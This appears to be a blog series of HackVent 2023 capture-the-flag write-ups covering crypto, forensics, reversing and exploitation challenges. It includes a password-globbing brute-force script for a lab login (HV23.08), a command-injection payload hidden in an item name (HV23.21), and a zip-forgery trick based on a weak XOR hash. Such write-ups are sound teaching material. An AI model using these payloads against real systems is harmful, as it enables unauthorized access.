Hv23s on Gian Klug

HackVent 2023 - [HV23.01] A letter from Santa

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Category: Fun

Author: Coderion

Finally, after 11 months of resting, Santa can finally send out his presents and challenges again. He was writing a letter to his youngest baby elf, who’s just learning his ABC/A-Z’s. Can you help the elf read the message?

Upon opening the page, we can select a letter and enter some text:

If we use something like |||, the output looks like a part of a QR code:

HackVent 2023 - [HV23.02] Who am I?

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Category: Fun

Author: expl01t

Have you ever wished for an efficient dating profile for geeks? Here’s a great example: G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++

When using the Cipher Identifier from dcode.fr with the message, we get Geek Code as the highest result.

HackVent 2023 - [HV23.03] Santa's grille

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Categories: Cryptography, Fun

Author: brp64

While contemplating the grille and turning some burgers, Santa decided to send all the hackers worldwide some season’s greetings.

I’ve used https://merri.cx/enigmator/cipher/grille.html and played a bit around with the grille to match HV23{. After some trial and error I got to the following grille:

That resulted in 3r4y_hHV23{mt2023}8ckven, with a bit of guessing I could determine the flag: HV23{m3rry_h8ckvent2023}

HackVent 2023 - [HV23.04] Bowser

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Categories: Reverse Engineering

Author: veganjay

Santa has heard that some kids appreciate a video game as a christmas gift. He would rather have the kids solve some CTF challenges, so he took some inspiration and turned it into a challenge. Can you save the princess?

Opening the binary in binary ninja reveals the following:

Just running ./bowser mario doesn’t work though, we only get a message:

Sorry, your flag is in another castle.

So, let’s look at the algorithm; &str seems to contain the flag, “encrypted” with bitwise NOT. It looks like the loop is terminated early due to a NULL byte though. The easiest way for me was to just use CyberChef with the string and use the NOT operation:

HackVent 2023 - [HV23.05] Aurora

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Category: Fun

Author: monkey9508

The Northern Lights appeared at exceptionally low latitudes this year due to the high level of solar activity. But from Santa’s grotto at the North Pole, it’s not unusual at all to see them stretching across the sky. Snowball the elf tried to capture a video of the aurora for his Instagram feed, but his phone doesn’t work well in poor light, and the results were rather grainy and disappointing. Is there anything you can do to obtain a clearer image?

HackVent 2023 - [HV23.06] Santa should use a password manager

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Categories: Fun, Forensic

Author: wangibangi

Santa is getting old and has troubles remembering his password. He said password Managers are too complicated for him and he found a better way. So he screenshotted his password and decided to store it somewhere handy, where he can always find it and where its easy to access.

We get a memory dump of a windows machine. I used MemProcFS to mount the image:

HackVent 2023 - [HV23.07] The golden book of Santa

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Categories: Forensic, Network Security, Web Security

Author: darkstar

An employee found out that someone is selling secret information from Santa’s golden book. For security reasons, the service for accessing the book was immediately stopped and there is now only a note about the maintenance work. However, it still seems possible that someone is leaking secret data.

The challenge provides a TCP server that always returns the same chunked response. After trying around a lot, I found that the flag is hidden in the chunk length that is used for every chunk:

HackVent 2023 - [HV23.08] SantaLabs bask

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Web

Author: coderion

Ditch flask and complicated python. With SantaLabs bask, you can write interactive websites using good, old bash and even template your files by using dynamic scripting!

The initial password check fails to escape the string in quotes when doing string comparison. Thus it supports globbing and the password can be guessed:

import requests
from string import ascii_lowercase

password = ""
url = "http://localhost:3000/login"

def check_pw():
    body = f"password={password}"
    r = requests.post(url, body)
    if "logged" in r.text:
        return True
    return False

def check_glob(pw):
    body = f"password={pw}*"
    r = requests.post(url, body)
    if "logged" in r.text:
        return True
    return False

while True:
    for c in ascii_lowercase:
        check = password + c
        print(f"Trying: {check}")
        if check_glob(check):
            password += c
            break
    if check_pw():
        print(f"Password: {password}")
        break

We get salami as the password and can then log in to get the flag:

HackVent 2023 - [HV23.09] Passage encryption

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Categories: Network Security, Fun

Author: dr_nick

Santa looked at the network logs of his machine and noticed that one of the elves browsed a weird website. He managed to get the pcap of it, and it seems as though there is some sensitive information in there?!

Even though the pcap looked like this is some kind of web forensics challenge, the flag was actually in the source ports used to connect to the server:

HackVent 2023 - [HV23.10] diy-jinja

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Web Security

Author: coderion

We’ve heard you like to create your own forms. With SANTA (Secure and New Template Automation), you can upload your own jinja templates and have the convenience of HTML input fields to have your friends fill them out! Obviously 100% secure and even with anti-tampering protection!

This challange actually had two unintended solutions (Regex bypass and abusing the description field for labels), the intended solution was to just use {% %} tags for flow control instead of {{}}:

HackVent 2023 - [HV23.11] Santa's Pie

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Forensic

Author: coderion

Santa baked you a pie with hidden ingredients!

Zsteg doesn’t reveal anything of interest, however when looking at the numerical red values per pixel, we get the following:

3 | 1 | 4 | 1 | 5 | 9 | 2 | 6 | 5 | 3 | ...

Looks a lot like pi… The second pixel is just image data for the pie image and the third pixel seems like it contains random values.

HackVent 2023 - [HV23.11] unsanta

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Cryptography

Author: kuyaya

To train his skills in cybersecurity, Grinch has played this year’s SHC qualifiers. He was inspired by the cryptography challenge unm0unt41n (can be found here) and thought he might play a funny prank on Santa. Grinch is a script kiddie and stole the malware idea and almost the whole code. Instead of using the original encryption malware from the challenge though, he improved it a bit so that no one can recover his secret! Luckily, Santa had a backup of one of the images. Maybe this can help you find the secret and recover all of Santa’s lost data…?

HackVent 2023 - [HV23.13] Santa's Router

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Cryptography

Author: fabi_07

Santa came across a weird service that provides something with signatures of a firmware. He isn’t really comfortable with all that crypto stuff, can you help him with this?

The security issue lies in the hashFile function:

def hashFile(fileContent: bytes) -> int:
    hash = 0
    for i in range(0, len(fileContent), 8):
        h = []
        for j in range(8):
            if i + j < len(fileContent):
                h.append(fileContent[i + j] << 8 * j)
        hash ^= sum(h)
    return hash

As XOR is used to add every byte to the hash, this means we get 0 again when we have the same byte twice. As tht zipfile module just ignores leading data and tries to use the last zip signature we can create a payload of <original zip> <evil zip> <evil zip>.

HackVent 2023 - [HV23.14] Crypto Dump

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Categories: Reverse Engineering, Cryptography, Forensic

Author: LogicalOverflow

To keep today’s flag save, Santa encrypted it, but now the elf cannot figure out how to decrypt it. The tool just crashes all the time. Can you still recover the flag?

After reverse engineering the binary and identifying the encrypted flag is in r13 and the key in r15 we can load it into gdb together with the coredump:

$ gdb -q flagsave coredump

pwndbg> info registers
rax            0x0                 0
rbx            0x2b                43
rcx            0x9f5be40e          2673599502
rdx            0x3                 3
rsi            0x8                 8
rdi            0x8                 8
rbp            0x7ffeef3dd718      0x7ffeef3dd718
rsp            0x7ffeef3dd660      0x7ffeef3dd660
r8             0x3c                60
r9             0x7fc80c16f520      140497173017888
r10            0x3c                60
r11            0x40cbb7            4246455
r12            0x7fc80c170030      140497173020720
r13            0x7fc80c16f040      140497173016640
r14            0x40c0fb            4243707
r15            0x7ffeef3dd670      140732912227952
rip            0x40113a            0x40113a <main+250>
eflags         0x10246             [ PF ZF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
fs_base        0x4136d8            4273880
gs_base        0x0                 0
pwndbg> x/44xb 0x7fc80c16f040
0x7fc80c16f040: 0xaf 0x71 0x38 0xad 0x96 0x08 0xc9 0x14
0x7fc80c16f048: 0xbe 0xbd 0xfe 0x19 0xbe 0x9f 0x28 0x25
0x7fc80c16f050: 0xbd 0x98 0xa7 0x0f 0xfd 0x3a 0x45 0x58
0x7fc80c16f058: 0x18 0x8f 0x8d 0x8e 0xf8 0xbb 0x15 0x66
0x7fc80c16f060: 0x73 0x5f 0x0b 0x61 0x81 0x35 0xbe 0xb5
0x7fc80c16f068: 0x0d 0x80 0xc9 0x00
pwndbg> x/40xb 0x7ffeef3dd670
0x7ffeef3dd670: 0x9b 0xaf 0x7d 0x5c 0xac 0x41 0x41 0xc8
0x7ffeef3dd678: 0xcb 0x8c 0xfa 0x3f 0xd2 0x70 0xfc 0x4b
0x7ffeef3dd680: 0xee 0xa0 0xcd 0x54 0x0a 0x54 0x25 0x0a
0x7ffeef3dd688: 0xd8 0x8f 0x8f 0x94 0xcb 0x40 0x0f 0x91
0x7ffeef3dd690: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Then, converting these results into a python script:

HackVent 2023 - [HV23.15] pREVesc

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Categories: Reverse Engineering, Linux

Author: coderion

We recently changed the root password for santa as he always broke our system. However, I think he has hidden some backdoor in there. Please help us find it to save christmas!

Let’s check for suspicious SUID binaries:

$ find / -perm -u=s -type f -printf "%c %p\n" 2>/dev/null
Thu Dec 14 22:42:01.4223715090 2023 /usr/bin/chfn
Thu Dec 14 22:42:01.4283715360 2023 /usr/bin/chsh
Thu Dec 14 22:42:01.5413720460 2023 /usr/bin/gpasswd
Thu Dec 14 22:42:01.6493725340 2023 /usr/bin/mount
Thu Dec 14 22:42:01.6563725660 2023 /usr/bin/newgrp
Thu Dec 14 22:56:40.6374276490 2023 /usr/bin/passwd
Thu Dec 14 22:42:01.8133732750 2023 /usr/bin/su
Thu Dec 14 22:42:01.8493734380 2023 /usr/bin/umount
Thu Dec 14 22:56:42.2574356380 2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
Thu Dec 14 22:56:42.2944358200 2023 /usr/lib/openssh/ssh-keysign

Looks like the passwd binary has been modified. After copying it to the local machine, we can look at it using binary ninja:

HackVent 2023 - [HV23.16] Santa's Gift Factory

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Category: Exploitation

Author: fabi_07

Did you know that Santa has its own factory for making gifts? Maybe you can exploit it to get your own special gift!

There is a vulnerable gets+ printf in tellflag that allows us to both leak the memory offsets of the binary and libc, and do ROP.

As the flag gets replaced after getting to that point in code though, we have to follow a different approach:

HackVent 2023 - [HV23.17] Lost Key

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Categories: Cryptography, Forensics

Author: darkstar

After losing another important key, the administrator sent me a picture of a key as a replacement. But what should I do with it?

We get a large flag.enc and that picture of a key. Upon running exiftool on the image, we can see the following:

Comment : Key Info: 0x10001

So we’re probably dealing with RSA here, 0x10001 is the most common used public exponent e, probably more common known in decimal: 65537.

HackVent 2023 - [HV23.18] Evil USB

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Category: Reverse Engineering

Author: coderion

An engineer at SantaSecCorp has found a suspicious device stuck in the USB port of his computer. It doesn’t seem to work anymore, but we managed to dump the firmware for you. Please help us find out what the device did to their computer.

We get a firmware.elf that we can open in Ghidra as AVR8 16-Bit.

It looks like there is some XOR with 0x69 happening:

HackVent 2023 - [HV23.19] Santa's Minecraft Server

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Categories: Linux, Penetration Testing

Author: nichtseb

Santa likes to play minecraft. His favorite version is 1.16. For security reasons, the server is not publicly accessible. But Santa is a little show-off, so he has an online map to brag about his fabulous building skills.

We get access to a dynmap web interface. The mentioned version 1.16 is vulnerable to the log4j exploit.

Dynmap has a chat box that we can utilize to exploit the log4j vulnerability using this PoC.

HackVent 2023 - [HV23.20] Santa's Candy Cane Machine

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Category: Reverse Engineering

Author: keep3r

As Santa wanted to start producing Candy Canes for this years christmas season, his machine wouldn’t work anymore. All he got was some error message about an “expired license”. Santa tried to get support from the manufacturer. Unfortunately, the company is out of business since many years. One of the elves already tried his luck but all he got out of the machine was a .dll! Can you help Santa license his Candy Cane machine and make all those kids happy for this years christmas?

HackVent 2023 - [HV23.21] Shopping List

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Category: Exploitation

Author: fabi_07

Santa still needs to buy some gifts, but he tends to forget things easily. That’s why he created his own application: A shopping list with state-of-the-art hacker protection.

For this one, there is an unintended solution. As the binary allows us an arbitrary write to a file, we can overwrite the binary itself with some bash.

We can’t just store a bash script though, as the list follows some format. Due to the way bash performs shell expansion before evaluating the rest, we can just use $(echo cat flag > vuln) as the name of the item and save it as vuln.

HackVent 2023 - [HV23.22] Secure Gift Wrapping Service

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Leet

Category: Exploitation

Author: darkice

This year, a new service has been launched to support the elves in wrapping gifts. Due to a number of stolen gifts in recent days, increased security measures have been introduced and the gifts are being stored in a secret place. As Christmas is getting closer, the elves need to load the gifts onto the sleigh, but they can’t find them. The only hint to this secret place was probably also packed in one of these gifts. Can you take a look at the service and see if you can find the secret?

HackVent 2023 - [HV23.23] Roll your own RSA

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Leet

Category: Cryptography

Author: cryze

Santa wrote his own script to encrypt his secrets with RSA. He got inspired from the windows login where you can specify a hint for your password, so he added a hint for his own software. This won’t break the encryption, will it?

As I had no idea about cryptography, I went to ask ChatGPT. To my surprise it gave me a working solve script:

HackVent 2023 - [HV23.H1] Kringle's Secret

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Easy

Category: Fun

Can you feel it? I feel like there’s a… hidden flag in one of the easy challenges!

The hidden flag for the easy category is in the [HV23.06] challenge. Running zsteg on the wallpaper reveals the flag:

$ zsteg wallpaper.png
...
b1,rgb,lsb,xy       .. text: "HV23{no_ctf_without_stego}"

HackVent 2023 - [HV23.H2] Grinch's Secret

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Medium

Category: Fun

Santa usually only gifts one present per kid, but one of his elves accidentally put two presents in the bag for a single kid! Somewhere in the medium challenges, you can find the second gift.

The flag is hidden in the [HV23.11] challenge. The alternations of “Never gonna give you up.” and “Never gonna let you down.” represent a 0 or 1 respectively.

We can update the solve script to include the hidden flag:

HackVent 2023 - [HV23.H3] Santa's Secret

Mon, 01 Jan 2024 00:00:00 +0000

Difficulty: Hard

Category: Fun

Not once, not twice, but three times Santa has hidden something in one of his gifts now!? Unbelievable…

The flag is hidden in the [HV23.20] challenge. There is a productName and productType enum for the keys. If we manage to generate a key of name CandyCaneMachine2000 and type Premium, we get the hidden flag on activation instead.

I’ve added a check to the original solution script to continue generating until such a key is found: